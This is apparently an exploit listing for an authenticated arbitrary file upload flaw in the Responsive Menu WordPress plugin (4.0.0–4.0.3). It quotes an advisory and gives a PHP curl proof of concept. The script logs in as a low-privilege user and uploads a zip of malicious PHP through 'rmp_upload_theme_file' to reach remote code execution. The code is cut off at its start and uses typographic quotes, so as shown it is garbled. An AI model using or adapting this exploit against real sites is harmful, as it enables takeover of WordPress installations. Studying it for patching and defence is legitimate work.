Responsive Menu 4.0.0 - 4.0.3 - Authenticated Arbitrary File Upload

“A subscriber could upload zip archives containing malicious PHP files that would get extracted to the /rmp-menu/themes/ directory. These files could then be accessed via the front end of the site to trigger remote code execution and ultimately allow an attacker to execute commands to further infect a WordPress site.”

PoC

$wp_user, ‘pwd’ => $wp_pass, ‘rememberme’ => ‘forever’, ‘wp-submit’ => ‘Log+In’, ]); $output = curl_exec($ch); curl_close($ch); // Update Settings $ch = curl_init(); $cFile = curl_file_create( realpath( $upfile ) ); curl_setopt($ch, CURLOPT_URL, $wp_url . ‘/wp-admin/admin-post.php’); curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar); curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, [ ‘action’ => ‘rmp_upload_theme_file’, ‘file’ => $cFile, ]); $output = curl_exec($ch); curl_close($ch); print_r($output); ?>